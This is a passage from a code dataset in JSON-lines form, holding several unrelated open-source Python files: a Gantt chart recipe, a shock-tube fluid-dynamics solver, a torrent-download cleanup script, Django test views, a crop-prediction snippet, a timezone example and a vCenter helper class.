ticks on every 7 days\n rule = mdates.rrulewrapper(mdates.DAILY, interval=7)\n loc = mdates.RRuleLocator(rule)\n formatter = mdates.DateFormatter(\"%d %b\")\n\n self._ax.xaxis.set_major_locator(loc)\n self._ax.xaxis.set_major_formatter(formatter)\n xlabels = self._ax.get_xticklabels()\n plt.setp(xlabels, rotation=30, fontsize=9)\n\n def _configure_figure(self):\n self._configure_xaxis()\n self._configure_yaxis()\n\n self._ax.grid(True, color='gray')\n self._set_legend()\n self._fig.autofmt_xdate()\n\n def _set_legend(self):\n '''\n Tweak font to be small and place *legend*\n in the upper right corner of the figure\n '''\n font = font_manager.FontProperties(size='small')\n self._ax.legend(loc='upper right', prop=font)\n\n def _positions(self, count):\n '''\n For given *count* number of positions, get array for the positions.\n '''\n end = count * Gantt.POS_STEP + Gantt.POS_START\n pos = np.arange(Gantt.POS_START, end, Gantt.POS_STEP)\n return pos\n\n def show(self):\n self._plot_bars()\n self._configure_figure()\n plt.show()\n\n\nif __name__ == '__main__':\n TEST_DATA = (\n { 'label': 'Research', 'start':'2013-10-01 12:00:00', 'end': '2013-10-02 18:00:00'}, # @IgnorePep8\n { 'label': 'Compilation', 'start':'2013-10-02 09:00:00', 'end': '2013-10-02 12:00:00'}, # @IgnorePep8\n { 'label': 'Meeting #1', 'start':'2013-10-03 12:00:00', 'end': '2013-10-03 18:00:00'}, # @IgnorePep8\n { 'label': 'Design', 'start':'2013-10-04 09:00:00', 'end': '2013-10-10 13:00:00'}, # @IgnorePep8\n { 'label': 'Meeting #2', 'start':'2013-10-11 09:00:00', 'end': '2013-10-11 13:00:00'}, # @IgnorePep8\n { 'label': 'Implementation', 'start':'2013-10-12 09:00:00', 'end': '2013-10-22 13:00:00'}, # @IgnorePep8\n { 'label': 'Demo', 'start':'2013-10-23 09:00:00', 'end': '2013-10-23 13:00:00'}, # @IgnorePep8\n )\n\n gantt = Gantt(TEST_DATA)\n gantt.show()\n","repo_name":"igormilovanovic/python-data-viz-cookbook","sub_path":"3367OS_Code/3367OS_08_Code/ch08_rec04_gantt.py","file_name":"ch08_rec04_gantt.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"73"} +{"seq_id":"4506970496","text":"from FluidProperties.GasProperty import *\nfrom ArrayTable import ArrayTable\n\n\nclass Node:\n def __init__(self):\n self.p = self.T = self.rho = self.u = None\n self.e = self.e0 = self.k = None\n self.U = None\n\n def Uinit(self, u, p, T, AFAK=1.e8, A=1):\n # from GasProperty import Rg\n # from GasProperty import k_Justi\n self.p = p\n self.T = T\n self.rho = p / (Rg(AFAK) * T)\n self.u = u\n\n self.k = 1.4 # k_Justi(self.T, AFAK)\n self.e = self.p / self.rho / (self.k - 1.)\n self.e0 = self.e + self.u ** 2 / 2.\n self.h0 = self.e0 + self.p / self.rho\n self.a = pow(self.k * self.p / self.rho, 1. / 2.)\n\n from numpy import array\n self.U = array([self.rho * A, self.rho * self.u * A,\n (self.p / (self.k - 1) + 1. / 2. * self.rho * self.u ** 2) * A]).transpose()\n\n def characLine(self):\n self.lamda = self.a + (self.k - 1.) / 2. * self.u\n self.beta = self.a - (self.k - 1.) / 2. * self.u\n self.lamdaDirection = (self.k + 1) / 2. / (self.k - 1) * self.lamda - (3. - self.k) / 2. / (\n self.k - 1.) * self.beta\n self.betaDirection = (3. - self.k) / 2. / (self.k - 1.) * self.lamda - (self.k + 1) / 2. / (\n self.k - 1) * self.beta\n\n def solve(self, U=None, A=1, AFAK=1.e8):\n # from GasProperty import Rg\n # from GasProperty import k_Justi\n if U is None:\n U = self.U\n else:\n self.U = U\n\n self.rho = U[0] / A\n self.u = U[1] / U[0]\n self.e = U[2] / U[0] - 1. / 2. * pow(U[1] / U[0], 2)\n T = self.e * (1.4 - 1.) / Rg(AFAK)\n\n # def kite(T):\n # return self.e - Rg(AFAK) * T / (k_Justi(T, AFAK) - 1)\n #\n # h = 1.\n # while abs(kite(T)) > 1.e-5:\n # T -= kite(T) / ((kite(T + h) - kite(T - h)) / 2. / h)\n self.T = T\n self.k = k_Justi(T, AFAK)\n self.p = Rg(AFAK) * T * self.rho\n # print(\"T={}\".format(self.T))\n # print(\"p={}\".format(self.p))\n # print(\"r={}\".format(self.rho))\n\n def F(self, U=None):\n if U is None:\n U = self.U\n from numpy import array\n temp = pow(U[1], 2) / U[0]\n self.F = array([U[1], temp + (self.k - 1) * (U[2] - temp / 2),\n U[1] * (U[2] + (self.k - 1) * (U[2] - temp / 2)) / U[0]]).transpose()\n return self.F\n\n def Jaccobi(self, U=None):\n if U is None:\n self.solve()\n U = self.U\n k = self.k\n else:\n self.U = U\n self.solve()\n k = self.k\n import numpy as np\n result = np.zeros([3, 3])\n result[0][1] = 1.\n result[1][0] = (k - 3.) / 2. * (U[1] ** 2) / (U[0] ** 2)\n result[1][1] = (3. - k) * U[1] / U[0]\n result[1][2] = k - 1.\n result[2][0] = -k * U[2] * U[1] / (U[0] ** 2) + (k - 1.) * (U[1] ** 3) / (U[0] ** 3)\n result[2][1] = k * U[2] / U[0] - (k - 1.) * 3. / 2. * U[1] ** 2 / U[0] ** 2\n result[2][2] = k * U[1] / U[0]\n\n self.J = result\n self.Jeigenvalue, self.Jeigenvector = np.linalg.eig(self.J)\n return result\n\n def FVS(self):\n import numpy as np\n absA = np.dot(np.dot(self.Jeigenvector, np.diag(abs(self.Jeigenvalue))), np.linalg.inv(self.Jeigenvector))\n self.Jpositive = (self.J + absA) / 2.\n self.Jnagative = (self.J - absA) / 2.\n self.Fpositive = np.dot(self.Jpositive, self.U)\n self.Fnagative = np.dot(self.Jnagative, self.U)\n\n\ndef StegerWarmingFVS(t, left=[], right=[], xlim=None, numberOfNode=200, A=1):\n import numpy as np\n init = ArrayTable(2, 0)\n\n solution = AnalyticalSolution(t, left, right)\n if xlim is None:\n mindata = [min(solution.table[i].data) for i in range(solution.col)]\n maxdata = [max(solution.table[i].data) for i in range(solution.col)]\n xlim = [1.5 * mindata[0], 1.5 * maxdata[0]]\n print(xlim)\n deltax = (xlim[1] - xlim[0]) / numberOfNode\n\n for i in np.arange(xlim[0], xlim[1], deltax):\n Nodeex = Node()\n if i < 0:\n Nodeex.Uinit(left[0], left[2], left[1])\n else:\n Nodeex.Uinit(right[0], right[2], right[1])\n Nodeex.Jaccobi()\n Nodeex.FVS()\n init.append([i, Nodeex])\n\n thisstep = init\n tnow = 0\n Corant = 0.9\n\n while tnow < t:\n laststep = thisstep\n mm = 0\n for i in range(laststep.row):\n if max(abs(laststep.table[1].data[i].Jeigenvalue)) > mm:\n mm = max(abs(laststep.table[1].data[i].Jeigenvalue))\n\n deltat = deltax * Corant / mm\n print(deltat)\n thisstep = ArrayTable(2, 0)\n thisstep.append([laststep.table[0].data[0], laststep.table[1].data[0]])\n for i in range(1, laststep.row - 1):\n Uthis = laststep.table[1].data[i].U - deltat / deltax * (\n (laststep.table[1].data[i + 1].Fnagative - laststep.table[1].data[i].Fnagative) + (\n laststep.table[1].data[i].Fpositive - laststep.table[1].data[i - 1].Fpositive))\n Nodethis = Node()\n Nodethis.solve(Uthis)\n Nodethis.Jaccobi()\n Nodethis.FVS()\n thisstep.append([laststep.table[0].data[i], Nodethis])\n thisstep.append([laststep.table[0].data[-1], laststep.table[1].data[-1]])\n\n tnow += deltat\n print(\"tnow={}\".format(tnow))\n print(\"Row of table {}\".format(thisstep.row))\n\n result = ArrayTable(5, 0)\n result.setTableHeader([\"x\", \"Velocity\", \"Density\", \"Pressure\", \"Temperature\"])\n result.setTableUnit([\"m\", \"m/s\", \"kg/m^3\", \"Pa\", \"K\"])\n for i in range(thisstep.row):\n result.append([thisstep.table[0].data[i], thisstep.table[1].data[i].u, thisstep.table[1].data[i].rho,\n thisstep.table[1].data[i].p,\n thisstep.table[1].data[i].T])\n return result\n\n\ndef laxWendroff1step(t, left=[], right=[], xlim=None, numberOfNode=500, A=1):\n import numpy as np\n init = ArrayTable(2, 0)\n\n solution = AnalyticalSolution(t, left, right)\n if xlim is None:\n mindata = [min(solution.table[i].data) for i in range(solution.col)]\n maxdata = [max(solution.table[i].data) for i in range(solution.col)]\n xlim = [1.5 * mindata[0], 1.5 * maxdata[0]]\n print(xlim)\n deltax = (xlim[1] - xlim[0]) / numberOfNode\n\n for i in np.arange(xlim[0], xlim[1], deltax):\n Nodeex = Node()\n if i < 0:\n Nodeex.Uinit(left[0], left[2], left[1])\n else:\n Nodeex.Uinit(right[0], right[2], right[1])\n Nodeex.Jaccobi()\n Nodeex.F()\n init.append([i, Nodeex])\n\n thisstep = init\n tnow = 0\n Corant = 0.9\n\n while tnow < t:\n laststep = thisstep\n mm = 0\n for i in range(laststep.row):\n if max(abs(laststep.table[1].data[i].Jeigenvalue)) > mm:\n mm = max(abs(laststep.table[1].data[i].Jeigenvalue))\n\n deltat = deltax * Corant / mm\n print(deltat)\n thisstep = ArrayTable(2, 0)\n thisstep.append([laststep.table[0].data[0], laststep.table[1].data[0]])\n for i in range(1, laststep.row - 1):\n Aright=1./2.*(laststep.table[1].data[i].J+laststep.table[1].data[i+1].J)\n Aleft=1./2.*(laststep.table[1].data[i].J+laststep.table[1].data[i-1].J)\n Uthis = laststep.table[1].data[i].U\\\n - deltat /2./ deltax * (laststep.table[1].data[i + 1].F - laststep.table[1].data[i-1].F)\\\n + deltat**2 /2./ deltax**2*(np.dot(Aright,(laststep.table[1].data[i+1].F - laststep.table[1].data[i].F))\n -np.dot(Aleft,(laststep.table[1].data[i].F - laststep.table[1].data[i-1].F)))\n\n Nodethis = Node()\n Nodethis.solve(Uthis)\n Nodethis.Jaccobi()\n Nodethis.F()\n thisstep.append([laststep.table[0].data[i], Nodethis])\n thisstep.append([laststep.table[0].data[-1], laststep.table[1].data[-1]])\n\n tnow += deltat\n print(\"tnow={}\".format(tnow))\n print(\"Row of table {}\".format(thisstep.row))\n\n result = ArrayTable(5, 0)\n result.setTableHeader([\"x\", \"Velocity\", \"Density\", \"Pressure\", \"Temperature\"])\n result.setTableUnit([\"m\", \"m/s\", \"kg/m^3\", \"Pa\", \"K\"])\n for i in range(thisstep.row):\n result.append([thisstep.table[0].data[i], thisstep.table[1].data[i].u, thisstep.table[1].data[i].rho,\n thisstep.table[1].data[i].p,\n thisstep.table[1].data[i].T])\n return result\n\n\n\n# def FVS(A):\n# import numpy as np\n# eva, evec = np.linalg.eig(A)\n# absA = np.dot(np.dot(evec, np.diag(abs(eva))), np.linalg.inv(evec))\n# Apositive = (A + absA) / 2\n# Anagative = (A - absA) / 2\n# return Apositive, Anagative\n\n\ndef AnalyticalSolution(t, left=[], right=[], xlim=None):\n import math\n u1 = left[0]\n u2 = right[0]\n # r1 = left[1];\n # r2 = right[1]\n T1 = left[1]\n T2 = right[1]\n p1 = left[2]\n p2 = right[2]\n # T1 = p1 / r1 / Rg();\n # T2 = p2 / r2 / Rg()\n r1 = p1 / Rg() / T1\n r2 = p2 / Rg() / T2\n k1 = k_Justi(T1)\n k2 = k_Justi(T2)\n a1 = math.sqrt(k1 * p1 / r1)\n a2 = math.sqrt(k2 * p2 / r2)\n\n # print(\"-\" * 100)\n # print(\"{0:^50}|{1:^50}\".format(\"ul=%.5gm/s\" % u1, \"ur=%.5gm/s\" % u2))\n # print(\"{0:^50}|{1:^50}\".format(\"rhol=%.5gkg/m^3\" % r1, \"rhor=%.5gkg/m^3\" % r2))\n # print(\"{0:^50}|{1:^50}\".format(\"pl=%sPa\" % p1, \"pr=%sPa\" % p2))\n # print(\"{0:^50}|{1:^50}\".format(\"Tl=%sK\" % T1, \"Tr=%sK\" % T2))\n # print(\"-\" * 100)\n\n def function(pbar, pj, rhoj, gamma=1.4):\n if pbar == pj:\n return 0\n elif pbar > pj:\n import math\n aj = math.sqrt(gamma * pj / rhoj)\n return (pbar - pj) / rhoj / aj / math.sqrt((gamma + 1) / 2. / gamma * pbar / pj + (gamma - 1) / 2. / gamma)\n elif pbar < pj:\n import math\n aj = math.sqrt(gamma * pj / rhoj)\n return 2. * aj / (gamma - 1.) * (pow(pbar / pj, (gamma - 1) / 2. / gamma) - 1)\n\n def F(p):\n return function(p, p1, r1, k1) + function(p, p2, r2, k2)\n\n pbar = (p1 + p2) / 2\n h = 10.\n while abs(u1 - u2 - F(pbar)) > 1.e-5:\n pbar -= (u1 - u2 - F(pbar)) / ((-F(pbar + h) + F(pbar - h)) / 2. / h)\n # print(pbar)\n ubar = (u1 + u2 - function(pbar, p1, r1, k1) + function(pbar, p2, r2, k2)) / 2.\n # print(ubar)\n\n A1 = r1 * a1 * math.sqrt((k1 + 1.) / (2. * k1) * pbar / p1 + (k1 - 1) / 2. / k1)\n A2 = r2 * a2 * math.sqrt((k2 + 1.) / (2. * k2) * pbar / p2 + (k2 - 1) / 2. / k2)\n\n if pbar >= p1:\n Z1 = u1 - A1 / r1\n else:\n Z1 = u1 - a1\n\n if pbar >= p2:\n Z2 = u2 + A2 / r2\n else:\n Z2 = u2 + a2\n\n if pbar >= p1:\n Z1star = Z1\n elif pbar > 0:\n a1star = a1 + (k1 - 1) / 2. * (u1 - ubar)\n Z1star = ubar - a1star\n else:\n Z1star = u1 - 2. * a1 / (k1 - 1)\n\n if pbar >= p2:\n Z2star = Z2\n elif pbar > 0:\n a2star = a2 - (k2 - 1) / 2. * (u2 - ubar)\n Z2star = ubar + a2star\n else:\n Z2star = u2 + 2 * a2 / (k2 - 1)\n\n r1bar = r1 * A1 / (A1 - r1 * (u1 - ubar))\n r2bar = r2 * A2 / (A2 + r2 * (u2 - ubar))\n\n # print(\"Z1=\", Z1)\n # print(\"Z1star=\", Z1star)\n # print(\"ubar=\", ubar)\n # print(\"Z2star=\", Z2star)\n # print(\"Z2=\", Z2)\n\n if xlim is None:\n Zlaggest = abs(Z1) if abs(Z1) > abs(Z2) else abs(Z2)\n xlim = [-1.5 * t * Zlaggest, 1.5 * t * Zlaggest]\n\n # print(\"Will draw air state between [{},{}]\".format(xlim[0],xlim[1]))\n\n def fun(t, x):\n if x / t > Z2:\n return u2, r2, p2\n elif x / t < Z1:\n return u1, r1, p1\n elif Z1star < x / t < ubar:\n return ubar, r1bar, pbar\n elif ubar < x / t < Z2star:\n return ubar, r2bar, pbar\n elif Z1 < x / t < Z1star:\n a = (k1 - 1) / (k1 + 1) * (u1 - x / t) + 2 * a1 / (k1 + 1)\n u = x / t + a\n p = p1 * pow(a / a1, 2 * k1 / (k1 - 1))\n r = k1 * p / a / a\n return u, r, p\n elif Z2star < x / t < Z2:\n a = (k2 - 1) / (k2 + 1) * (x / t - u2) + 2 * a2 / (k2 - 1)\n u = x / t - a\n p = p2 * pow(a / a2, 2 * k2 / (k2 - 1))\n r = k2 * p / a / a\n return u, r, p\n\n result = ArrayTable(5, 0)\n result.setTableHeader([\"x\", \"Velocity\", \"Density\", \"Pressure\", \"Temperature\"])\n result.setTableUnit([\"m\", \"m/s\", \"kg/m^3\", \"Pa\", \"K\"])\n import numpy as np\n step = (xlim[1] - xlim[0]) / 1000.\n xx = np.arange(xlim[0], xlim[1], step)\n for each in xx:\n u, r, p = fun(t, each)\n result.append([each, u, r, p, p / r / Rg()])\n return result\n\n\nclass ShockTube:\n def __init__(self, left, right):\n self.left = left\n self.right = right\n import math\n u1 = left[0]\n u2 = right[0]\n # r1 = left[1];\n # r2 = right[1]\n T1 = left[1]\n T2 = right[1]\n p1 = left[2]\n p2 = right[2]\n # T1 = p1 / r1 / Rg();\n # T2 = p2 / r2 / Rg()\n r1 = p1 / Rg() / T1\n r2 = p2 / Rg() / T2\n k1 = k_Justi(T1)\n k2 = k_Justi(T2)\n a1 = math.sqrt(k1 * p1 / r1)\n a2 = math.sqrt(k2 * p2 / r2)\n\n print(\"-\" * 100)\n print(\"{0:^50}|{1:^50}\".format(\"ul=%.5gm/s\" % u1, \"ur=%.5gm/s\" % u2))\n print(\"{0:^50}|{1:^50}\".format(\"rhol=%.5gkg/m^3\" % r1, \"rhor=%.5gkg/m^3\" % r2))\n print(\"{0:^50}|{1:^50}\".format(\"pl=%sPa\" % p1, \"pr=%sPa\" % p2))\n print(\"{0:^50}|{1:^50}\".format(\"Tl=%sK\" % T1, \"Tr=%sK\" % T2))\n print(\"-\" * 100)\n\n def AnalyticalSolutionAnimation(self, t):\n import numpy as np\n import matplotlib.pyplot as plt\n from matplotlib.animation import FuncAnimation\n result = AnalyticalSolution(t, self.left, self.right)\n mindata = [min(result.table[i].data) for i in range(result.col)]\n maxdata = [max(result.table[i].data) for i in range(result.col)]\n fig = plt.figure(0, figsize=(10, 10))\n ax = list()\n ln = list()\n for i in range(4):\n ax.append(fig.add_subplot(4, 1, i + 1))\n plt.ylabel(result.table[i + 1].ColName + \"(\" + result.table[i + 1].ColUnit + \")\")\n temp, = ax[i].plot([], [], 'b-', animated=False)\n ln.append(temp)\n plt.xlabel(\"x(m)\")\n plt.tight_layout()\n\n def init():\n for i in range(4):\n ax[i].set_xlim(mindata[0], maxdata[0])\n ax[i].set_ylim(0.8 * mindata[i + 1], 1.05 * maxdata[i + 1])\n\n return ln[0], ln[1], ln[2], ln[3]\n\n def update(t):\n solution = AnalyticalSolution(t, self.left, self.right, [mindata[0], maxdata[0]])\n for i in range(4):\n ln[i].set_data(solution.table[0].data, solution.table[i + 1].data)\n\n return ln[0], ln[1], ln[2], ln[3]\n\n ani = FuncAnimation(fig, update, frames=np.linspace(1.e-12, t, 90), interval=100,\n init_func=init, blit=True, repeat=False)\n # ani.save(\"shocktube.gif\", writer=\"pillow\")\n plt.show()\n\n # if pbar<0:\n # print(\"Left and right waves will all be rarefaction waves and there exists vacuum between them\")\n # Z1=u1-a1\n # Z1star=u1+2*a1/(k1-1)\n # Z2=u2+a2\n # Z2star=u2-2*a2/(k2-1)\n # def fun(t,x):\n # if x/tx/t>Z1: #左行稀疏波波内\n # a=(k1-1)/(k1+1)*(u1-x/t)+2*a1/(k1+1)\n # u=x/t+a\n # p=p1*pow(a/a1,2*k1/(k1-1))\n # r=k1*p/a/a\n # return u,r,p\n # if x/t>Z2: #右行波波前\n # return u2,r2,p2\n # if Z2>x/t>Z2star: #右行稀疏波波内\n # a=(k2-1)/(k2+1)*(x/t-u2)+2*a2/(k2-1)\n # u=x/t-a\n # p=p2*pow(a/a2,2*k2/(k2-1))\n # r=k2*p/a/a\n # return u,r,p\n\n # if p2 >= p1:\n # if (u1 - u2) >= F(p2):\n # print(\"Left and right waves will all be shock waves\")\n # a1 = math.sqrt(k1 * r1 / p1)\n # A1 = r1 * a1 * math.sqrt((k1 + 1) / 2. / k1 * pbar / p1 + (k1 - 1) / 2. / k1)\n # Z1 = u1 - A1 / r1\n # rho1bar = r1 * A1 / (A1 - r1 * (u1 - ubar))\n # a2=math.sqrt(k2*r2/p2)\n # A2=r2*a2*math.sqrt((k2+1)/2./k2*pbar/p2+(k2-1)/2./k2)\n # Z2=u2+A2/r2\n # rho2bar=r2*A2/(A2+r2*(u2-ubar))\n # def fun(t,x):\n # if Z1>x/t:\n # return u1,r1,p1\n # elif Z1 < x/t < ubar:\n # return ubar,rho1bar,pbar\n # elif x/t>Z2:\n # return u2,r2,p2\n # elif Z2 > x/t > ubar:\n # return ubar,rho2bar,pbar\n # elif (u1 - u2) >= F(p1):\n # print(\"left wave will be shock wave and right wave will be rarefaction wave\")\n #\n # elif (u1 - u2) >= F(0.):\n # print(\"Left and right waves will all be rarefaction waves\")\n # else:\n # print(\"Left and right waves will all be rarefaction waves and vacuum will between them\")\n # else:\n # if (u1 - u2) >= F(p1):\n # print(\"Left and right waves will all be shock waves\")\n # elif (u1 - u2) >= F(p2):\n # print(\"right wave will be shock wave and left wave will be rarefaction wave\")\n # elif (u1 - u2) >= F(0.):\n # print(\"Left and right waves will all be rarefaction waves\")\n # else:\n # print(\"Left and right waves will all be rarefaction waves and vacuum will between them\")\n def StegerWarmingFVSAnimation(self):\n pass\n\n\nif __name__==\"__main__\":\n # laxWendroff1step(0.6e-3,[1,1200,0.5e6],[0,300,0.1e6]).plot(1)\n ShockTube([1,1200,0.5e6],[0,300,0.1e6]).AnalyticalSolutionAnimation(0.6e-3)\n\n\n\nclass pipe1D:\n def __init__(self, pu, pd, Tu, Td):\n self.pu = pu\n self.pd = pd\n\n def boundaryCondition(self):\n pass\n","repo_name":"melan-thompson/pysmartengine","sub_path":"Pipe/ShockTube.py","file_name":"ShockTube.py","file_ext":"py","file_size_in_byte":18209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"11887076877","text":"import os\nimport re\nimport time\nimport subprocess\n\n'''\nUseful links:\ntorrent file structure: https://fileformats.fandom.com/wiki/Torrent_file\nopen file with buffer for byte-read: http://www.djangospin.com/python-file-buffering/\nRegExp for byte search: https://stackoverflow.com/questions/31019854/typeerror-cant-use-a-string-pattern-on-a-bytes-like-object-in-re-findall\n'''\n\ndef main():\n startTimer = time.perf_counter()\n\n # Scan 'Downloads' folder for torrent files.\n # Store them in lstTorrentFiles[(path, file)]\n # dictTorrentFiles = {'torrentFileName': {'filePath':path, 'fileName':name}}\n dictTorrentFiles = {}\n reTorrentFile = re.compile('.+\\.torrent')\n for root, dirs, files in os.walk('C:/Users/test/Downloads'):\n for file in files:\n if reTorrentFile.match(file):\n dictTorrentFiles[file] = {}\n dictTorrentFiles[file]['filePath'] = root\n dictTorrentFiles[file]['fileName'] = file\n\n # Add some comments to check github\n # Loop through list of torrent files and extracts where it stores local files\n # add result to\n # dictTorrentFiles = {'torrentFileName': {'localFiles': file/dir}}\n # and\n # dictTorrentFiles = {'torrentFileName': {'singleFiles': true/false}}\n for torrentFile in dictTorrentFiles.keys():\n filePath, fileName = dictTorrentFiles[torrentFile]['filePath'], dictTorrentFiles[torrentFile]['fileName']\n\n # open file with buffer for byte search\n with open(f\"{filePath}/{fileName}\", buffering=5) as readFile:\n rawFileContent = readFile.buffer\n torrentHeader = rawFileContent.readline()\n\n # RegExp should be with rb\"mask\" for byte search\n reInfoD = re.search(rb\"infod(\\d+):\", torrentHeader)\n # Single file torrent - infod6:length (==6)\n # Multi files torrent - infod5:files (==5)\n dictTorrentFiles[torrentFile]['singleFile'] = reInfoD.group(1).decode('UTF-8') == \"6\"\n\n # Looking for a name in torrent file\n currentPos = reInfoD.span()[1]\n reNameD = re.search(rb\"4:name(\\d+):\", torrentHeader[currentPos::])\n nameLength = int(reNameD.group(1))\n\n currentPos += reNameD.span()[1]\n dictTorrentFiles[torrentFile]['localFiles'] = torrentHeader[currentPos:currentPos+nameLength].decode('UTF-8')\n\n # Searching local directories for download files\n # reDownloadedFile = re.compile(rf\"{dictTorrentFiles[torrentFile]['localFiles']}\")\n for root, dirs, files in os.walk('C:/Users/test/Downloads'):\n if dictTorrentFiles[torrentFile]['singleFile'] == False:\n for dir in dirs:\n if dictTorrentFiles[torrentFile]['localFiles']==dir:\n dictTorrentFiles[torrentFile]['downloadedFiles'] = root + '/' + dir\n else:\n for file in files:\n if dictTorrentFiles[torrentFile]['localFiles']==file:\n dictTorrentFiles[torrentFile]['downloadedFiles'] = root + '/' + file\n\n\n # adding torrents to tracker and move them to proper location\n for key in dictTorrentFiles.keys():\n if 'downloadedFiles' in dictTorrentFiles[key]:\n ## !!! UNCOMMENT TO EXECUTE (SUBPROCESS)\n # Add torrent file if it's downloaded\n fileToDownload = dictTorrentFiles[key]['filePath'] + '\\\\' + dictTorrentFiles[key]['fileName']\n dirToDownload = 'C:/Users/test/Downloads/'\n cmdAddTorrent = f'C:/Users/test/AppData/Roaming/uTorrent/uTorrent.exe /DIRECTORY \"{dirToDownload}\" \"{fileToDownload}\"'\n print(cmdAddTorrent)\n # subprocess.Popen(cmdAddTorrent)\n time.sleep(5)\n\n ## !!! UNCOMMENT TO EXECUTE (SUBPROCESS)\n # Move torrent file to flash card\n cmdMvFile = f'MOVE \"{fileToDownload}\" \"C:\\\\tmp\\\\\"'\n print(cmdMvFile)\n # subprocess.run(cmdMvFile, shell=True)\n time.sleep(5)\n\n # To check\n # for key in dictTorrentFiles.keys():\n # if 'downloadedFiles' in dictTorrentFiles[key]:\n # print(f\"torrent:\\t\\t{dictTorrentFiles[key]['fileName']}\\nfiles:\\t\\t\\t{dictTorrentFiles[key]['localFiles']}\")\n # print(f\"download:\\t\\t{dictTorrentFiles[key]['downloadedFiles']}\")\n # print(f\"single?:\\t\\t{dictTorrentFiles[key]['singleFile']}\\n\")\n\n\n finishTimer = time.perf_counter()\n print(f\"Finished in {round(finishTimer-startTimer, 2)} second(s)\")\n\nif __name__ == '__main__':\n main()","repo_name":"egoryunov/torrents_cleanup","sub_path":"torrents_cleanup.py","file_name":"torrents_cleanup.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"26177204234","text":"from django.shortcuts import render\nfrom django.views.generic import CreateView\n\nfrom .models import TestScaleItModel, TestCropItModel\n\n# Create your views here.\nclass TestScaleItView(CreateView):\n model = TestScaleItModel\n template_name = \"test_view.html\"\n fields = ['image']\n\n\nclass TestCropItView(CreateView):\n model = TestCropItModel\n template_name = \"test_view.html\"\n fields = ['image']","repo_name":"byite/django-imageit","sub_path":"tests/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"73"} +{"seq_id":"70358508396","text":"# import pandas as pd\r\n# from sklearn.model_selection import train_test_split\r\n# data = pd.read_csv(\"Crop_recommendation.csv\")\r\n# label = data[\"label\"]\r\n# data = data.drop(\"label\",axis=1)\r\n# X_train,x_test,y_train,y_test = train_test_split(data,label,random_state=0,test_size=.20)\r\n# # print(len(X_train))\r\n# # print(len(x_test))\r\n# # print(len(y_train))\r\n# # print(len(y_test))\r\n# from sklearn.svm import SVC\r\n# from sklearn.ensemble import AdaBoostClassifier\r\n# model =SVC(kernel='rbf')\r\n# model.fit(X_train,y_train)\r\n# y_pred = model.predict(x_test)\r\n# from sklearn.metrics import accuracy_score\r\n#\r\n# accuracy = accuracy_score(y_test,y_pred)\r\n# print(accuracy)\r\nimport numpy as np\r\narray = np.array([62,52,16,22.27526694,58.84015925,6.9670577620000005,63.87020584])\r\narray = array.reshape(1,-1)\r\nprint(array)\r\nimport pickle as pk\r\n# file = open(\"trained_model.pkl\",\"ab\")\r\n# pk.dump(model,file)\r\n# file.close()\r\nmodel = pk.load(open(\"trained_model.pkl\",\"rb\"))\r\ngive = model.predict(array)\r\nprint(give)","repo_name":"anup-66/MACHINE-LEARNING-PROJECTS","sub_path":"geeks_geeks_hackathon/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"16101978778","text":"from datetime import datetime\nfrom zoneinfo import ZoneInfo\n\n\ndef run():\n data_czas_today = datetime.today()\n data_czas_now = datetime.now()\n now_wwa = datetime.now(tz=ZoneInfo('Europe/Warsaw'))\n now_ny = datetime.now(tz=ZoneInfo('America/New_York'))\n\n print(data_czas_today)\n print(data_czas_now)\n print(now_wwa)\n print(now_ny)\n\n print(now_wwa == now_ny)\n print(now_wwa.replace(microsecond=0) == now_ny.replace(microsecond=0))\n\n \nif __name__ == '__main__':\n run()\n","repo_name":"keinam53/Python_Wtajemniczenie","sub_path":"05_Strefy_czasowe/2_Obiekty_aware/Przyklad.py","file_name":"Przyklad.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"5881296956","text":"class DeployDataHolder(object):\n def __init__(self, d):\n for a, b in d.items():\n if isinstance(b, dict):\n setattr(self, a, DeployDataHolder(b))\n elif isinstance(b, list):\n items = [self._create_obj_by_type(item) for item in b]\n setattr(self, a, items)\n else:\n setattr(self, a, self._create_obj_by_type(b))\n\n @staticmethod\n def _create_obj_by_type(obj):\n obj_type = type(obj)\n if obj_type == dict:\n return DeployDataHolder(obj)\n if obj_type == list:\n return [DeployDataHolder._create_obj_by_type(item) for item in obj]\n if DeployDataHolder._is_primitive(obj):\n return obj_type(obj)\n return obj\n\n @staticmethod\n def _is_primitive(thing):\n primitive = (int, str, bool, float, unicode)\n return isinstance(thing, primitive)\n\n @classmethod\n def create_from_params(cls, template_model, datastore_name, vm_cluster_model, ip_regex, refresh_ip_timeout,\n auto_power_on, auto_power_off, wait_for_ip, auto_delete):\n \"\"\"\n :param VCenterTemplateModel template_model:\n :param str datastore_name:\n :param VMClusterModel vm_cluster_model:\n :param str ip_regex: Custom regex to filter IP addresses\n :param refresh_ip_timeout:\n :param bool auto_power_on:\n :param bool auto_power_off:\n :param bool wait_for_ip:\n :param bool auto_delete:\n \"\"\"\n dic = {\n 'template_model': template_model,\n 'datastore_name': datastore_name,\n 'vm_cluster_model': vm_cluster_model,\n 'ip_regex': ip_regex,\n 'refresh_ip_timeout': refresh_ip_timeout,\n 'auto_power_on': auto_power_on,\n 'auto_power_off': auto_power_off,\n 'wait_for_ip': wait_for_ip,\n 'auto_delete': auto_delete\n }\n return cls(dic)\n","repo_name":"QualiSystems/vCenterShell","sub_path":"package/cloudshell/cp/vcenter/models/DeployDataHolder.py","file_name":"DeployDataHolder.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"73"} +{"seq_id":"35523534067","text":"lst=[]\n\nfor i in range(10):\n n=eval(input())\n lst.append(n)\n \ns=sum(lst)\ns=s - 